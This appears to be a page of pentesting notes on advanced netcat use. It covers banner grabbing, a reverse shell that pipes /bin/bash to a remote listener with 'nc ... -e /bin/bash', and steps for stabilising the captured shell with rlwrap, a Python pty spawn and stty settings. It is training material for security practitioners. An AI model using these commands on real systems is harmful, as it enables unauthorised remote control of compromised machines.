Netcat - Advanced

Usage and Examples

Using netcat for banner grabbing

nc 192.168.1.1 80

Reverse shell with netcat

On listener's machine:

nc -lvnp 1234

(The option specifies listening verbosely on the given port with no name resolution)

On target machine:

nc [target_ip] 1234 -e /bin/bash

(Specifying -e /bin/bash is optional.)

Stabilizing Netcat

By default, Netcat shells are often unstable and lack features like command history, tab completion, and proper terminal handling. Stabilizing the shell involves transforming it into a more robust and interactive session in order to improve its reliability, and enhance the control over the compromised system.

Methods for Netcat Shell Stabilization

Using `rlwrap`

Steps:

1. Install `rlwrap` in your local machine if not installed

sudo apt-get install rlwrap

2. Use the netcat command with `rlwrap`

rlwrap nc -lvnp 4444

Background the shell with Ctrl + Z .
Re-enter the shell

stty raw -echo; fg

Upgrading to fully interactive TTY

Use python:

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

stty raw -echo; fg

Setting terminal variables

Steps:

Background the netcat shell

Use the command CTRL + Z.

Set terminal typs

stty raw -echo; fg

Export terminal variables

reset

export SHELL=bash

export TERM=xterm

stty rows [number] columns [number]

(Replace [number] with the appropriate values for your terminal size)

Overview of Netcat Shell stabilization

Step 1:

Use Python to spawn a better-featured bash shell, which will make our shell look a bit prettier.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We still won’t be able to use tab autocomplete or the arrow keys.

Step 2:

Get access to term commands such as clear.

export TERM=xterm

Step 3:

Now, background the shell.

Ctrl + Z

Step 4:

Use the following back in the normal terminal:

stty raw -echo; fg

This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes.

Step 5:

Finally correct the distorted rows and columns of the terminal shell where we write command.

stty rows 38 columns 116

PreviousNetcat - Intro NextJohn the Ripper - Intro

Last updated 9 months ago